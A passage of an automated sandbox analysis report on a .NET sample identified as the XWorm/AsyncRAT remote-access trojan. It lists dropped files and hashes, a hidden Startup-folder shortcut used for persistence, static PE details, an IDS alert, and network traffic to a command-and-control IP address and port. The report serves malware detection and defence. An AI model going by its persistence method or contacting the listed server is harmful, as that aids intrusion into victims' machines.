                                                                SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jsipqgz.qqq.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3i3h4th.dow.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czgwv1be.vw0.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmxaqams.f0q.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxqxys0o.2gj.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gotsvb5b.kin.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o33v20rc.gdk.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozi1fi5h.gjm.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5qu4cj1.453.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tp4yspwv.kbi.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2zza042.dqa.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5jdqoqb.nat.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uprw2nyn.jhx.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vl42zo4x.adf.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye2jy1p0.wmf.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z45n1omk.2a2.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk

                                                                Download File
                                                                Process:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 14 16:54:54 2024, mtime=Sat Dec 14 16:54:54 2024, atime=Sat Dec 14 16:54:54 2024, length=72704, window=hide
                                                                Category:dropped
                                                                Size (bytes):735
                                                                Entropy (8bit):5.026761360030534
                                                                Encrypted:false
                                                                SSDEEP:12:8S3s43xyWC8dY//js8SLh51XjA69rH2LpKmCm/BmV:8SNht/+7s8shrzA69i1KmCm/Bm
                                                                MD5:21237855699496FFCADB4F0B6597C967
                                                                SHA1:A4AB7FB07B7AEDA6DD694FFE1F9DD544D7E26D97
                                                                SHA-256:08DD01E06B6A327F9D6D1494066D2BE346B6D6AC0199269F368DC15BE0541C9D
                                                                SHA-512:618677D82DB583810C4655FB0C4201D640564698245DB8D34C84E23B616BA2F6F088597610E31D3CF65B3DBCC52CE4646A992B06C0C8CB4E69F2E10539D23BA1
                                                                Malicious:false
                                                                Preview:L..................F.... ...=.#HQN..=.#HQN..=.#HQN..........................h.:..DG..Yr?.D..U..k0.&...&......vk.v.......!QN..a[@HQN......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y............................2f..R.o.a.m.i.n.g.....T.2......Y. .SYSTEM..>......Y..Y.....]........................S.Y.S.T.E.M.......T...............-.......S...........,..p.....C:\Users\user\AppData\Roaming\SYSTEM........\.....\.....\.....\.....\.S.Y.S.T.E.M.`.......X.......473627...........hT..CrF.f4... .E..yD....,.......hT..CrF.f4... .E..yD....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                C:\Users\user\AppData\Roaming\SYSTEM

                                                                Download File
                                                                Process:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):72704
                                                                Entropy (8bit):6.0841332923455544
                                                                Encrypted:false
                                                                SSDEEP:1536:g6KqzkOtZ/KWOym8mLgLNlRePq+bP64pfzia8Sh66xXOs09Zs8:6/mZQhQXRei+bP64kmROsCS8
                                                                MD5:0860112F7BD00567371FAFFE18061CAB
                                                                SHA1:84A59BD00070C7BFEB141A2C745C31A6451F7DB9
                                                                SHA-256:E58E3513066CA537D090CDFAE72904220A90BA3B081BBD9D49318E27788C5729
                                                                SHA-512:6C62C5B6551825BFF75D3C62A214BAC9A9D5EB4FE982DC0B97531774309FE2DE52110204951B9E82954969CD98E2D95C41873EB35B1DDDFF8B8BF35D3759A1DF
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6f]g.............................0... ...@....@.. ....................................@.................................\0..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........^..d.......&.....................................................(....*.r...p*. <...*..(....*.rK..p*. }(..*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. .R..*.r)..p*. ...*.rs..p*. ~.H.*.r...p*. *p{.*..((...*.r...p*. .O..*.rG..p*"(....+.*&(....&+.*.+5sV... .... .'..oW...(,...~....-.(G...(9...~....oX...&.-.*.r...p*.rE..p*. .8..*.r...p*. .}.*.r...p*. ..H.*.r#..p*. ....*.rm..p*. 6V=.*..............j..................sY..............*"(I...+.*:.t....(

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):6.0841332923455544
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:72OWK7wBVH.exe
                                                                File size:72'704 bytes
                                                                MD5:0860112f7bd00567371faffe18061cab
                                                                SHA1:84a59bd00070c7bfeb141a2c745c31a6451f7db9
                                                                SHA256:e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729
                                                                SHA512:6c62c5b6551825bff75d3c62a214bac9a9d5eb4fe982dc0b97531774309fe2de52110204951b9e82954969cd98e2d95c41873eb35b1dddff8b8bf35d3759a1df
                                                                SSDEEP:1536:g6KqzkOtZ/KWOym8mLgLNlRePq+bP64pfzia8Sh66xXOs09Zs8:6/mZQhQXRei+bP64kmROsCS8
                                                                TLSH:15639D8CB7E54A24E1FEDFB15DA66253C639F2231803D66F14C601DA2727A88CD50BF2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6f]g.............................0... ...@....@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:90cececece8e8eb0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4130ae
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x675D6636 [Sat Dec 14 11:04:22 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1305c0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x4ce.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x110b40x11200a16d4debf3e6176db93d0c6447ec96e0False0.6149920164233577data6.159483925482598IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x140000x4ce0x60047876d674e03afeaa7a2d0ab9714c884False0.375data3.7419403129268916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x160000xc0x20041a6fc4df2aefd789e923f0d41087724False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_VERSION0x140a00x244data0.47413793103448276
                                                                RT_MANIFEST0x142e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-14T18:55:10.501670+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449737147.185.221.2424891TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 14, 2024 18:54:56.782618046 CET4973724891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:54:56.903428078 CET2489149737147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:54:56.903968096 CET4973724891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:54:57.063486099 CET4973724891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:54:57.183526993 CET2489149737147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:10.501669884 CET4973724891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:10.628555059 CET2489149737147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:18.793708086 CET2489149737147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:18.793814898 CET4973724891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:19.451656103 CET4973724891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:19.453624964 CET4979024891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:19.571449995 CET2489149737147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:19.573353052 CET2489149790147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:19.573451996 CET4979024891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:19.599795103 CET4979024891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:19.720964909 CET2489149790147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:33.155133009 CET4979024891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:33.275046110 CET2489149790147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:41.528280973 CET2489149790147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:41.528352976 CET4979024891192.168.2.4147.185.221.24
